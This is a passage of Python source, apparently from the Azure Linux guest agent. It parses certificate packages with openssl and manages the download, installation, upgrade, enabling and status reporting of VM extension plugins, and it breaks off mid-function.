<Data>MIILTAY... # </Data> # </CertificateFile> def __init__(self): self.reinitialize() def reinitialize(self): """ Reset the Role, Incarnation """ self.Incarnation = None self.Role = None def Parse(self, xmlText): """ Parse multiple certificates into seperate files. """ self.reinitialize() SetFileContents("Certificates.xml", xmlText) dom = xml.dom.minidom.parseString(xmlText) for a in ["CertificateFile", "Version", "Incarnation", "Format", "Data", ]: if not dom.getElementsByTagName(a): Error("Certificates.Parse: Missing " + a) return None node = dom.childNodes[0] if node.localName != "CertificateFile": Error("Certificates.Parse: root not CertificateFile") return None SetFileContents("Certificates.p7m", "MIME-Version: 1.0\n" + "Content-Disposition: attachment; filename=\"Certificates.p7m\"\n" + "Content-Type: application/x-pkcs7-mime; name=\"Certificates.p7m\"\n" + "Content-Transfer-Encoding: base64\n\n" + GetNodeTextData(dom.getElementsByTagName("Data")[0])) if Run( Openssl + " cms -decrypt -in Certificates.p7m -inkey TransportPrivate.pem -recip TransportCert.pem | " + Openssl + " pkcs12 -nodes -password pass: -out Certificates.pem"): Error("Certificates.Parse: Failed to extract certificates from CMS message.") return self # There may be multiple certificates in this package. Split them. file = open("Certificates.pem") pindex = 1 cindex = 1 output = open("temp.pem", "w") for line in file.readlines(): output.write(line) if re.match(r'[-]+END .*?(KEY|CERTIFICATE)[-]+$', line): output.close() if re.match(r'[-]+END .*?KEY[-]+$', line): os.rename("temp.pem", str(pindex) + ".prv") pindex += 1 else: os.rename("temp.pem", str(cindex) + ".crt") cindex += 1 output = open("temp.pem", "w") output.close() os.remove("temp.pem") keys = dict() index = 1 filename = str(index) + ".crt" while os.path.isfile(filename): thumbprint = \ (RunGetOutput(Openssl + " x509 -in " + filename + " -fingerprint -noout")[1]).rstrip().split('=')[ 1].replace(':', '').upper() pubkey = RunGetOutput(Openssl + " x509 -in " + filename + " -pubkey -noout")[1] keys[pubkey] = thumbprint os.rename(filename, thumbprint + ".crt") os.chmod(thumbprint + ".crt", 0o600) MyDistro.setSelinuxContext(thumbprint + '.crt', 'unconfined_u:object_r:ssh_home_t:s0') index += 1 filename = str(index) + ".crt" index = 1 filename = str(index) + ".prv" while os.path.isfile(filename): pubkey = RunGetOutput(Openssl + " rsa -in " + filename + " -pubout 2> /dev/null ")[1] os.rename(filename, keys[pubkey] + ".prv") os.chmod(keys[pubkey] + ".prv", 0o600) MyDistro.setSelinuxContext(keys[pubkey] + '.prv', 'unconfined_u:object_r:ssh_home_t:s0') index += 1 filename = str(index) + ".prv" return self class ExtensionsConfig(object): """ Parse ExtensionsConfig, downloading and unpacking them to /var/lib/waagent. Install if <enabled>true</enabled>, remove if it is set to false. """ # <?xml version="1.0" encoding="utf-8"?> # <Extensions version="1.0.0.0" goalStateIncarnation="6"><Plugins> # <Plugin name="OSTCExtensions.ExampleHandlerLinux" version="1.5" # location="http://previewusnorthcache.blob.core.test-cint.azure-test.net/d84b216d00bf4d96982be531539e1513/OSTCExtensions_ExampleHandlerLinux_usnorth_manifest.xml" # config="" state="enabled" autoUpgrade="false" runAsStartupTask="false" isJson="true" /> # </Plugins> # <PluginSettings> # <Plugin name="OSTCExtensions.ExampleHandlerLinux" version="1.5"> # <RuntimeSettings seqNo="2">{"runtimeSettings":[{"handlerSettings":{"protectedSettingsCertThumbprint":"1BE9A13AA1321C7C515EF109746998BAB6D86FD1", # "protectedSettings":"MIIByAYJKoZIhvcNAQcDoIIBuTCCAbUCAQAxggFxMIIBbQIBADBVMEExPzA9BgoJkiaJk/IsZAEZFi9XaW5kb3dzIEF6dXJlIFNlcnZpY2UgTWFuYWdlbWVudCBmb3IgR # Xh0ZW5zaW9ucwIQZi7dw+nhc6VHQTQpCiiV2zANBgkqhkiG9w0BAQEFAASCAQCKr09QKMGhwYe+O4/a8td+vpB4eTR+BQso84cV5KCAnD6iUIMcSYTrn9aveY6v6ykRLEw8GRKfri2d6 # tvVDggUrBqDwIgzejGTlCstcMJItWa8Je8gHZVSDfoN80AEOTws9Fp+wNXAbSuMJNb8EnpkpvigAWU2v6pGLEFvSKC0MCjDTkjpjqciGMcbe/r85RG3Zo21HLl0xNOpjDs/qqikc/ri43Y76E/X # v1vBSHEGMFprPy/Hwo3PqZCnulcbVzNnaXN3qi/kxV897xGMPPC3IrO7Nc++AT9qRLFI0841JLcLTlnoVG1okPzK9w6ttksDQmKBSHt3mfYV+skqs+EOMDsGCSqGSIb3DQEHATAUBggqh # kiG9w0DBwQITgu0Nu3iFPuAGD6/QzKdtrnCI5425fIUy7LtpXJGmpWDUA==","publicSettings":{"port":"3000"}}}]}</RuntimeSettings> # </Plugin> # </PluginSettings> def __init__(self): self.reinitialize() def reinitialize(self): """ Reset members. """ self.Extensions = None self.Plugins = None self.Util = None def Parse(self, xmlText): """ Write configuration to file ExtensionsConfig.xml. Log plugin specific activity to /var/log/azure/<Publisher>.<PluginName>/<Version>/CommandExecution.log. If state is enabled: if the plugin is installed: if the new plugin's version is higher if DisallowMajorVersionUpgrade is false or if true, the version is a minor version do upgrade: download the new archive do the updateCommand. disable the old plugin and remove enable the new plugin if the new plugin's version is the same or lower: create the new .settings file from the configuration received do the enableCommand if the plugin is not installed: download/unpack archive and call the installCommand/Enable if state is disabled: call disableCommand if state is uninstall: call uninstallCommand remove old plugin directory. """ self.reinitialize() self.Util = Util() dom = xml.dom.minidom.parseString(xmlText) LogIfVerbose(xmlText) self.plugin_log_dir = '/var/log/azure' if not os.path.exists(self.plugin_log_dir): os.mkdir(self.plugin_log_dir) try: self.Extensions = dom.getElementsByTagName("Extensions") pg = dom.getElementsByTagName("Plugins") if len(pg) > 0: self.Plugins = pg[0].getElementsByTagName("Plugin") else: self.Plugins = [] incarnation = self.Extensions[0].getAttribute("goalStateIncarnation") SetFileContents('ExtensionsConfig.' + incarnation + '.xml', xmlText) except Exception as e: Error('ERROR: Error parsing ExtensionsConfig: {0}.'.format(e)) return None for p in self.Plugins: if len(p.getAttribute("location")) < 1: # this plugin is inside the PluginSettings continue p.setAttribute('restricted', 'false') previous_version = None version = p.getAttribute("version") name = p.getAttribute("name") plog_dir = self.plugin_log_dir + '/' + name + '/' + version if not os.path.exists(plog_dir): os.makedirs(plog_dir) p.plugin_log = plog_dir + '/CommandExecution.log' handler = name + '-' + version if p.getAttribute("isJson") != 'true': Error("Plugin " + name + " version: " + version + " is not a JSON Extension. Skipping.") continue Log("Found Plugin: " + name + ' version: ' + version) if p.getAttribute("state") == 'disabled' or p.getAttribute("state") == 'uninstall': # disable zip_dir = LibDir + "/" + name + '-' + version mfile = None for root, dirs, files in os.walk(zip_dir): for f in files: if f in ('HandlerManifest.json'): mfile = os.path.join(root, f) if mfile != None: break if mfile == None: Error('HandlerManifest.json not found.') continue manifest = GetFileContents(mfile) p.setAttribute('manifestdata', manifest) if self.launchCommand(p.plugin_log, name, version, 'disableCommand') == None: self.SetHandlerState(handler, 'Enabled') Error('Unable to disable ' + name) SimpleLog(p.plugin_log, 'ERROR: Unable to disable ' + name) else: self.SetHandlerState(handler, 'Disabled') Log(name + ' is disabled') SimpleLog(p.plugin_log, name + ' is disabled') # uninstall if needed if p.getAttribute("state") == 'uninstall': if self.launchCommand(p.plugin_log, name, version, 'uninstallCommand') == None: self.SetHandlerState(handler, 'Installed') Error('Unable to uninstall ' + name) SimpleLog(p.plugin_log, 'Unable to uninstall ' + name) else: self.SetHandlerState(handler, 'NotInstalled') Log(name + ' uninstallCommand completed .') # remove the plugin Run('rm -rf ' + LibDir + '/' + name + '-' + version + '*') Log(name + '-' + version + ' extension files deleted.') SimpleLog(p.plugin_log, name + '-' + version + ' extension files deleted.') continue # state is enabled # if the same plugin exists and the version is newer or # does not exist then download and unzip the new plugin plg_dir = None latest_version_installed = LooseVersion("0.0") for item in os.listdir(LibDir): itemPath = os.path.join(LibDir, item) if os.path.isdir(itemPath) and name in item: try: # Split plugin dir name with '-' to get intalled plugin name and version sperator = item.rfind('-') if sperator < 0: continue installed_plg_name = item[0:sperator] installed_plg_version = LooseVersion(item[sperator + 1:]) # Check installed plugin name and compare installed version to get the latest version installed if installed_plg_name == name and installed_plg_version > latest_version_installed: plg_dir = itemPath previous_version = str(installed_plg_version) latest_version_installed = installed_plg_version except Exception as e: Warn("Invalid plugin dir name: {0} {1}".format(item, e)) continue if plg_dir == None or LooseVersion(version) > LooseVersion(previous_version): location = p.getAttribute("location") Log("Downloading plugin manifest: " + name + " from " + location) SimpleLog(p.plugin_log, "Downloading plugin manifest: " + name + " from " + location) self.Util.Endpoint = location.split('/')[2] Log("Plugin server is: " + self.Util.Endpoint) SimpleLog(p.plugin_log, "Plugin server is: " + self.Util.Endpoint) manifest = self.Util.HttpGetWithoutHeaders(location, chkProxy=True) if manifest == None: Error( "Unable to download plugin manifest" + name + " from primary location. Attempting with failover location.") SimpleLog(p.plugin_log, "Unable to download plugin manifest" + name + " from primary location. Attempting with failover location.") failoverlocation = p.getAttribute("failoverlocation") self.Util.Endpoint = failoverlocation.split('/')[2] Log("Plugin failover server is: " + self.Util.Endpoint) SimpleLog(p.plugin_log, "Plugin failover server is: " + self.Util.Endpoint) manifest = self.Util.HttpGetWithoutHeaders(failoverlocation, chkProxy=True) # if failoverlocation also fail what to do then? if manifest == None: AddExtensionEvent(name, WALAEventOperation.Download, False, 0, version, "Download mainfest fail " + failoverlocation) Log("Plugin manifest " + name + " downloading failed from failover location.") SimpleLog(p.plugin_log, "Plugin manifest " + name + " downloading failed from failover location.") filepath = LibDir + "/" + name + '.' + incarnation + '.manifest' if os.path.splitext(location)[-1] == '.xml': # if this is an xml file we may have a BOM if ord(manifest[0]) > 128 and ord(manifest[1]) > 128 and ord(manifest[2]) > 128: manifest = manifest[3:] SetFileContents(filepath, manifest) # Get the bundle url from the manifest p.setAttribute('manifestdata', manifest) man_dom = xml.dom.minidom.parseString(manifest) bundle_uri = "" for mp in man_dom.getElementsByTagName("Plugin"): if GetNodeTextData(mp.getElementsByTagName("Version")[0]) == version: bundle_uri = GetNodeTextData(mp.getElementsByTagName("Uri")[0]) break if len(mp.getElementsByTagName("DisallowMajorVersionUpgrade")): if GetNodeTextData(mp.getElementsByTagName("DisallowMajorVersionUpgrade")[ 0]) == 'true' and previous_version != None and previous_version.split('.')[ 0] != version.split('.')[0]: Log('DisallowMajorVersionUpgrade is true, this major version is restricted from upgrade.') SimpleLog(p.plugin_log, 'DisallowMajorVersionUpgrade is true, this major version is restricted from upgrade.') p.setAttribute('restricted', 'true') continue if len(bundle_uri) < 1: Error("Unable to fetch Bundle URI from manifest for " + name + " v " + version) SimpleLog(p.plugin_log, "Unable to fetch Bundle URI from manifest for " + name + " v " + version) continue Log("Bundle URI = " + bundle_uri) SimpleLog(p.plugin_log, "Bundle URI = " + bundle_uri) # Download the zipfile archive and save as '.zip' bundle = self.Util.HttpGetWithoutHeaders(bundle_uri, chkProxy=True) if bundle == None: AddExtensionEvent(name, WALAEventOperation.Download, True, 0, version, "Download zip fail " + bundle_uri) Error("Unable to download plugin bundle" + bundle_uri) SimpleLog(p.plugin_log, "Unable to download plugin bundle" + bundle_uri) continue AddExtensionEvent(name, WALAEventOperation.Download, True, 0, version, "Download Success") b = bytearray(bundle) filepath = LibDir + "/" + os.path.basename(bundle_uri) + '.zip' SetFileContents(filepath, b) Log("Plugin bundle" + bundle_uri + "downloaded successfully length = " + str(len(bundle))) SimpleLog(p.plugin_log, "Plugin bundle" + bundle_uri + "downloaded successfully length = " + str(len(bundle))) # unpack the archive z = zipfile.ZipFile(filepath) zip_dir = LibDir + "/" + name + '-' + version z.extractall(zip_dir) Log('Extracted ' + bundle_uri + ' to ' + zip_dir) SimpleLog(p.plugin_log, 'Extracted ' + bundle_uri + ' to ' + zip_dir) # zip no file perms in .zip so set all the scripts to +x Run("find " + zip_dir + " -type f | xargs chmod u+x ") # write out the base64 config data so the plugin can process it. mfile = None for root, dirs, files in os.walk(zip_dir): for f in files: if f in ('HandlerManifest.json'): mfile = os.path.join(root, f) if mfile != None: break if mfile == None: Error('HandlerManifest.json not found.') SimpleLog(p.plugin_log, 'HandlerManifest.json not found.') continue manifest = GetFileContents(mfile) p.setAttribute('manifestdata', manifest) # create the status and config dirs Run('mkdir -p ' + root + '/status') Run('mkdir -p ' + root + '/config') # write out the configuration data to goalStateIncarnation.settings file in the config path. config = '' seqNo = '0' if len(dom.getElementsByTagName("PluginSettings")) != 0: pslist = dom.getElementsByTagName("PluginSettings")[0].getElementsByTagName("Plugin") for ps in pslist: if name == ps.getAttribute("name") and version == ps.getAttribute("version"): Log("Found RuntimeSettings for " + name + " V " + version) SimpleLog(p.plugin_log, "Found RuntimeSettings for " + name + " V " + version) config = GetNodeTextData(ps.getElementsByTagName("RuntimeSettings")[0]) seqNo = ps.getElementsByTagName("RuntimeSettings")[0].getAttribute("seqNo") break if config == '': Log("No RuntimeSettings for " + name + " V " + version) SimpleLog(p.plugin_log, "No RuntimeSettings for " + name + " V " + version) SetFileContents(root + "/config/" + seqNo + ".settings", config) # create HandlerEnvironment.json handler_env = '[{ "name": "' + name + '", "seqNo": "' + seqNo + '", "version": 1.0, "handlerEnvironment": { "logFolder": "' + os.path.dirname( p.plugin_log) + '", "configFolder": "' + root + '/config", "statusFolder": "' + root + '/status", "heartbeatFile": "' + root + '/heartbeat.log"}}]' SetFileContents(root + '/HandlerEnvironment.json', handler_env) self.SetHandlerState(handler, 'NotInstalled') cmd = '' getcmd = 'installCommand' if plg_dir != None and previous_version != None and LooseVersion(version) > LooseVersion( previous_version): previous_handler = name + '-' + previous_version if self.GetHandlerState(previous_handler) != 'NotInstalled': getcmd = 'updateCommand' # disable the old plugin if it exists if self.launchCommand(p.plugin_log, name, previous_version, 'disableCommand') == None: self.SetHandlerState(previous_handler, 'Enabled') Error('Unable to disable old plugin ' + name + ' version ' + previous_version) SimpleLog(p.plugin_log, 'Unable to disable old plugin ' + name + ' version ' + previous_version) else: self.SetHandlerState(previous_handler, 'Disabled') Log(name + ' version ' + previous_version + ' is disabled') SimpleLog(p.plugin_log, name + ' version ' + previous_version + ' is disabled') try: Log("Copy status file from old plugin dir to new") old_plg_dir = plg_dir new_plg_dir = os.path.join(LibDir, "{0}-{1}".format(name, version)) old_ext_status_dir = os.path.join(old_plg_dir, "status") new_ext_status_dir = os.path.join(new_plg_dir, "status") if os.path.isdir(old_ext_status_dir): for status_file in os.listdir(old_ext_status_dir): status_file_path = os.path.join(old_ext_status_dir, status_file) if os.path.isfile(status_file_path): shutil.copy2(status_file_path, new_ext_status_dir) mrseq_file = os.path.join(old_plg_dir, "mrseq") if os.path.isfile(mrseq_file): shutil.copy(mrseq_file, new_plg_dir) except Exception as e: Error("Failed to copy status file.") isupgradeSuccess = True if getcmd == 'updateCommand': if self.launchCommand(p.plugin_log, name, version, getcmd, previous_version) == None: Error('Update failed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Update failed for ' + name + '-' + version) isupgradeSuccess = False else: Log('Update complete' + name + '-' + version) SimpleLog(p.plugin_log, 'Update complete' + name + '-' + version) # if we updated - call unistall for the old plugin if self.launchCommand(p.plugin_log, name, previous_version, 'uninstallCommand') == None: self.SetHandlerState(previous_handler, 'Installed') Error('Uninstall failed for ' + name + '-' + previous_version) SimpleLog(p.plugin_log, 'Uninstall failed for ' + name + '-' + previous_version) isupgradeSuccess = False else: self.SetHandlerState(previous_handler, 'NotInstalled') Log('Uninstall complete' + previous_handler) SimpleLog(p.plugin_log, 'Uninstall complete' + name + '-' + previous_version) try: # rm old plugin dir if os.path.isdir(plg_dir): shutil.rmtree(plg_dir) Log(name + '-' + previous_version + ' extension files deleted.') SimpleLog(p.plugin_log, name + '-' + previous_version + ' extension files deleted.') except Exception as e: Error("Failed to remove old plugin directory") AddExtensionEvent(name, WALAEventOperation.Upgrade, isupgradeSuccess, 0, previous_version) else: # run install if self.launchCommand(p.plugin_log, name, version, getcmd) == None: self.SetHandlerState(handler, 'NotInstalled') Error('Installation failed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Installation failed for ' + name + '-' + version) else: self.SetHandlerState(handler, 'Installed') Log('Installation completed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Installation completed for ' + name + '-' + version) # end if plg_dir == none or version > = prev # change incarnation of settings file so it knows how to name status... zip_dir = LibDir + "/" + name + '-' + version mfile = None for root, dirs, files in os.walk(zip_dir): for f in files: if f in ('HandlerManifest.json'): mfile = os.path.join(root, f) if mfile != None: break if mfile == None: Error('HandlerManifest.json not found.') SimpleLog(p.plugin_log, 'HandlerManifest.json not found.') continue manifest = GetFileContents(mfile) p.setAttribute('manifestdata', manifest) config = '' seqNo = '0' if len(dom.getElementsByTagName("PluginSettings")) != 0: try: pslist = dom.getElementsByTagName("PluginSettings")[0].getElementsByTagName("Plugin") except: Error('Error parsing ExtensionsConfig.') SimpleLog(p.plugin_log, 'Error parsing ExtensionsConfig.') continue for ps in pslist: if name == ps.getAttribute("name") and version == ps.getAttribute("version"): Log("Found RuntimeSettings for " + name + " V " + version) SimpleLog(p.plugin_log, "Found RuntimeSettings for " + name + " V " + version) config = GetNodeTextData(ps.getElementsByTagName("RuntimeSettings")[0]) seqNo = ps.getElementsByTagName("RuntimeSettings")[0].getAttribute("seqNo") break if config == '': Error("No RuntimeSettings for " + name + " V " + version) SimpleLog(p.plugin_log, "No RuntimeSettings for " + name + " V " + version) SetFileContents(root + "/config/" + seqNo + ".settings", config) # state is still enable if (self.GetHandlerState(handler) == 'NotInstalled'): # run install first if true if self.launchCommand(p.plugin_log, name, version, 'installCommand') == None: self.SetHandlerState(handler, 'NotInstalled') Error('Installation failed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Installation failed for ' + name + '-' + version) else: self.SetHandlerState(handler, 'Installed') Log('Installation completed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Installation completed for ' + name + '-' + version) if (self.GetHandlerState(handler) != 'NotInstalled'): if self.launchCommand(p.plugin_log, name, version, 'enableCommand') == None: self.SetHandlerState(handler, 'Installed') Error('Enable failed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Enable failed for ' + name + '-' + version) else: self.SetHandlerState(handler, 'Enabled') Log('Enable completed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Enable completed for ' + name + '-' + version) # this plugin processing is complete Log('Processing completed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Processing completed for ' + name + '-' + version) # end plugin processing loop Log('Finished processing ExtensionsConfig.xml') try: SimpleLog(p.plugin_log, 'Finished processing ExtensionsConfig.xml') except: pass return self def launchCommand(self, plugin_log, name, version, command, prev_version=None): commandToEventOperation = { "installCommand": WALAEventOperation.Install, "uninstallCommand": WALAEventOperation.UnIsntall, "updateCommand": WALAEventOperation.Upgrade, "enableCommand": WALAEventOperation.Enable, "disableCommand": WALAEventOperation.Disable, } isSuccess = True start = datetime.datetime.now() r = self.__launchCommandWithoutEventLog(plugin_log, name, version, command, prev_version) if r == None: isSuccess = False Duration = int((datetime.datetime.now() - start).seconds) if commandToEventOperation.get(command): AddExtensionEvent(name, commandToEventOperation[command], isSuccess, Duration, version) return r def __launchCommandWithoutEventLog(self, plugin_log, name, version, command, prev_version=None): # get the manifest and read the command mfile = None zip_dir = LibDir + "/" + name + '-' + version for root, dirs, files in os.walk(zip_dir): for f in files: if f in ('HandlerManifest.json'): mfile = os.path.join(root, f) if mfile != None: break if mfile == None: Error('HandlerManifest.json not found.') SimpleLog(plugin_log, 'HandlerManifest.json not found.') return None manifest = GetFileContents(mfile) try: jsn = json.loads(manifest) except: Error('Error parsing HandlerManifest.json.') SimpleLog(plugin_log, 'Error parsing HandlerManifest.json.') return None if type(jsn) == list: jsn = jsn[0] if jsn.has_key('handlerManifest'): cmd = jsn['handlerManifest'][command] else: Error('Key handlerManifest not found. Handler cannot be installed.') SimpleLog(plugin_log, 'Key handlerManifest not found. Handler cannot be installed.') if len(cmd) == 0: Error('Unable to read ' + command) SimpleLog(plugin_log, 'Unable to read ' + command) return None # for update we send the path of the old installation arg = '' if prev_version != None: arg = ' ' + LibDir + '/' + name + '-' + prev_version dirpath = os.path.dirname(mfile) LogIfVerbose('Command is ' + dirpath + '/' + cmd) # launch pid = None try: child = subprocess.Popen(dirpath + '/' + cmd + arg, shell=True, cwd=dirpath, stdout=subprocess.PIPE) except Exception as e: Error('Exception launching ' + cmd + str(e)) SimpleLog(plugin_log, 'Exception launching ' + cmd + str(e)) pid = child.pid if pid == None or pid < 1: ExtensionChildren.append((-1, root)) Error('Error launching ' + cmd + '.') SimpleLog(plugin_log, 'Error launching ' + cmd + '.') else: ExtensionChildren.append((pid, root)) Log("Spawned " + cmd + " PID " + str(pid)) SimpleLog(plugin_log, "Spawned " + cmd + " PID " + str(pid)) # wait until install/upgrade is finished timeout = 300 # 5 minutes retry = timeout / 5 while retry > 0 and child.poll() == None: LogIfVerbose(cmd + ' still running with PID ' + str(pid)) time.sleep(5) retry -= 1 if retry == 0: Error('Process exceeded timeout of ' + str(timeout) + ' seconds. Terminating process ' + str(pid)) SimpleLog(plugin_log, 'Process exceeded timeout of ' + str(timeout) + ' seconds. Terminating process ' + str(pid)) os.kill(pid, 9) return None code = child.wait() if code == None or code != 0: Error('Process ' + str(pid) + ' returned non-zero exit code (' + str(code) + ')') SimpleLog(plugin_log, 'Process ' + str(pid) + ' returned non-zero exit code (' + str(code) + ')') return None Log(command + ' completed.') SimpleLog(plugin_log, command + ' completed.') return 0 def ReportHandlerStatus(self): """ Collect all status reports. """ # { "version": "1.0", "timestampUTC": "2014-03-31T21:28:58Z", # "aggregateStatus": { # "guestAgentStatus": { "version": "2.0.4PRE", "status": "Ready", "formattedMessage": { "lang": "en-US", "message": "GuestAgent is running and accepting new configurations." } }, # "handlerAggregateStatus": [{ # "handlerName": "ExampleHandlerLinux", "handlerVersion": "1.0", "status": "Ready", "runtimeSettingsStatus": { # "sequenceNumber": "2", "settingsStatus": { "timestampUTC": "2014-03-31T23:46:00Z", "status": { "name": "ExampleHandlerLinux", "operation": "Command Execution Finished", "configurationAppliedTime": "2014-03-31T23:46:00Z", "status": "success", "formattedMessage": { "lang": "en-US", "message": "Finished executing command" }, # "substatus": [ # { "name": "StdOut", "status": "success", "formattedMessage": { "lang": "en-US", "message": "Goodbye world!" } }, # { "name": "StdErr", "status": "success", "formattedMessage": { "lang": "en-US", "message": "" } } # ] # } } } } # ] # }} try: incarnation = self.Extensions[0].getAttribute("goalStateIncarnation") except: Error('Error parsing attribute "goalStateIncarnation". Unable to send status reports') return -1 status = '' statuses = '' for p in self.Plugins: if p.getAttribute("state") == 'uninstall' or p.getAttribute("restricted") == 'true': continue version = p.getAttribute("version") name = p.getAttribute("name") if p.getAttribute("isJson") != 'true': LogIfVerbose("Plugin " + name + " version: " + version + " is not a JSON Extension. Skipping.") continue reportHeartbeat = False if len(p.getAttribute("manifestdata")) < 1: Error("Failed to get manifestdata.") else: reportHeartbeat = json.loads(p.getAttribute("manifestdata"))[0]['handlerManifest']['reportHeartbeat'] if len(statuses) > 0: statuses += ',' statuses += self.GenerateAggStatus(name, version, reportHeartbeat) tstamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()) # header # agent state if provisioned == False: if provisionError == None: agent_state = 'Provisioning' agent_msg = 'Guest Agent is starting.' else: agent_state = 'Provisioning Error.' agent_msg = provisionError else: agent_state = 'Ready' agent_msg = 'GuestAgent is running and accepting new configurations.' status = '{"version":"1.0","timestampUTC":"' + tstamp + '","aggregateStatus":{"guestAgentStatus":{"version":"' + GuestAgentVersion + '","status":"' + agent_state + '","formattedMessage":{"lang":"en-US","message":"' + agent_msg + '"}},"handlerAggregateStatus":[' + statuses + ']}}' try: uri = GetNodeTextData(self.Extensions[0].getElementsByTagName("StatusUploadBlob")[0]).replace('&amp;', '&') except: Error('Error parsing element "StatusUploadBlob". Unable to send status reports') return -1 LogIfVerbose('Status report ' + status + ' sent to ' + uri) return UploadStatusBlob(uri, status.encode("utf-8")) def GetCurrentSequenceNumber(self, plugin_base_dir): """ Get the settings file with biggest file number in config folder """ config_dir = os.path.join(plugin_base_dir, 'config') seq_no = 0 for subdir, dirs, files in os.walk(config_dir): for file in files: try: cur_seq_no = int(os.path.basename(file).split('.')[0]) if cur_seq_no > seq_no: seq_no = cur_seq_no except ValueError: continue return str(seq_no) def GenerateAggStatus(self, name, version, reportHeartbeat=False): """ Generate the status which Azure can understand by the status and heartbeat reported by extension """ plugin_base_dir = LibDir + '/' + name + '-' + version + '/' current_seq_no = self.GetCurrentSequenceNumber(plugin_base_dir) status_file = os.path.join(plugin_base_dir, 'status/', current_seq_no + '.status') heartbeat_file = os.path.join(plugin_base_dir, 'heartbeat.log') handler_state_file = os.path.join(plugin_base_dir, 'config', 'HandlerState') agg_state = 'NotReady' handler_state = None status_obj = None status_code = None formatted_message = None localized_message = None if os.path.exists(handler_state_file): handler_state = GetFileContents(handler_state_file).lower() if HandlerStatusToAggStatus.has_key(handler_state): agg_state = HandlerStatusToAggStatus[handler_state] if reportHeartbeat: if os.path.exists(heartbeat_file): d = int(time.time() - os.stat(heartbeat_file).st_mtime) if d > 600: # not updated for more than 10 min agg_state = 'Unresponsive' else: try: heartbeat = json.loads(GetFileContents(heartbeat_file))[0]["heartbeat"] agg_state = heartbeat.get("status") status_code = heartbeat.get("code") formatted_message = heartbeat.get("formattedMessage") localized_message = heartbeat.get("message") except: Error("Incorrect heartbeat file. Ignore it. ") else: agg_state = 'Unresponsive' # get status file reported by extension if os.path.exists(status_file): # raw status generated by extension is an array, get the first item and remove the unnecessary element try: status_obj = json.loads(GetFileContents(status_file))[0] del status_obj["version"] except: Error("Incorrect status file. Will NOT settingsStatus in settings. ") agg_status_obj = {"handlerName": name, "handlerVersion": version, "status": agg_state, "runtimeSettingsStatus": {"sequenceNumber": current_seq_no}} if status_obj: agg_status_obj["runtimeSettingsStatus"]["settingsStatus"] = status_obj if status_code != None: agg_status_obj["code"] = status_code if formatted_message: agg_status_obj["formattedMessage"] = formatted_message if localized_message: agg_status_obj["message"] = localized_message agg_status_string = json.dumps(agg_status_obj) LogIfVerbose("Handler Aggregated Status:" + agg_status_string) return agg_status_string def SetHandlerState(self, handler, state=''): zip_dir = LibDir + "/" + handler mfile = None for root, dirs, files in os.walk(zip_dir): for f in files: if f in ('HandlerManifest.json'): mfile = os.path.join(root, f) if mfile != None: break if mfile == None: Error('SetHandlerState(): HandlerManifest.json not found, cannot set HandlerState.') return None Log("SetHandlerState: " + handler + ", " + state) return SetFileContents(os.path.dirname(mfile) + '/config/HandlerState', state) def GetHandlerState(self, handler): handlerState = GetFileContents(handler + '/config/HandlerState') if (handlerState): return handlerState.rstrip('\r\n') else: return 'NotInstalled' class HostingEnvironmentConfig(object): """ Parse Hosting enviromnet config and store in HostingEnvironmentConfig.xml """ # # <HostingEnvironmentConfig version="1.0.0.0" goalStateIncarnation="1"> # <StoredCertificates> # <StoredCertificate name="Stored0Microsoft.WindowsAzure.Plugins.RemoteAccess.PasswordEncryption" certificateId="sha1:C093FA5CD3AAE057CB7C4E04532B2E16E07C26CA" storeName="My" configurationLevel="System" /> # </StoredCertificates> # <Deployment name="db00a7755a5e4e8a8fe4b19bc3b330c3" guid="{ce5a036f-5c93-40e7-8adf-2613631008ab}" incarnation="2"> # <Service name="MyVMRoleService" guid="{00000000-0000-0000-0000-000000000000}" /> # <ServiceInstance name="db00a7755a5e4e8a8fe4b19bc3b330c3.1" guid="{d113f4d7-9ead-4e73-b715-b724b5b7842c}" /> # </Deployment> # <Incarnation number="1" instance="MachineRole_IN_0" guid="{a0faca35-52e5-4ec7-8fd1-63d2bc107d9b}" /> # <Role guid="{73d95f1c-6472-e58e-7a1a-523554e11d46}" name="MachineRole" hostingEnvironmentVersion="1" software="" softwareType="ApplicationPackage" entryPoint="" parameters="" settleTimeSeconds="10" /> # <HostingEnvironmentSettings name="full" Runtime="rd_fabric_stable.110217-1402.RuntimePackage_1.0.0.8.zip"> # <CAS mode="full" /> # <PrivilegeLevel mode="max" /> # <AdditionalProperties><CgiHandlers></CgiHandlers></AdditionalProperties> # </HostingEnvironmentSettings> # <ApplicationSettings> # <Setting name="__ModelData" value="&lt;m role=&quot;MachineRole&quot; xmlns=&quot;urn:azure:m:v1&quot;>&lt;r name=&quot;MachineRole&quot;>&lt;e name=&quot;a&quot; />&lt;e name=&quot;b&quot; />&lt;e name=&quot;Microsoft.WindowsAzure.Plugins.RemoteAccess.Rdp&quot; />&lt;e name=&quot;Microsoft.WindowsAzure.Plugins.RemoteForwarder.RdpInput&quot; />&lt;/r>&lt;/m>" /> # <Setting name="Microsoft.WindowsAzure.Plugins.Diagnostics.ConnectionString" value="DefaultEndpointsProtocol=http;AccountName=osimages;AccountKey=DNZQ..." /> # <Setting name="Microsoft.WindowsAzure.Plugins.RemoteForwarder.Enabled" value="true" /> # </ApplicationSettings> # <ResourceReferences> # <Resource name="DiagnosticStore" type="directory" request="Microsoft.Cis.Fabric.Controller.Descriptions.ServiceDescription.Data.Policy" sticky="true" size="1" path="db00a7755a5e4e8a8fe4b19bc3b330c3.MachineRole.DiagnosticStore\" disableQuota="false" /> # </ResourceReferences> # </HostingEnvironmentConfig> # def __init__(self): self.reinitialize() def reinitialize(self): """ Reset Members. """ self.StoredCertificates = None self.Deployment = None self.Incarnation = None self.Role = None self.HostingEnvironmentSettings = None self.ApplicationSettings = None self.Certificates = None self.ResourceReferences = None def Parse(self, xmlText): """ Parse and create HostingEnvironmentConfig.xml. """ self.reinitialize() SetFileContents("HostingEnvironmentConfig.xml", xmlText) dom = xml.dom.minidom.parseString(xmlText) for a in ["HostingEnvironmentConfig", "Deployment", "Service", "ServiceInstance", "Incarnation", "Role", ]: if not dom.getElementsByTagName(a): Error("HostingEnvironmentConfig.Parse: Missing " + a) return None node = 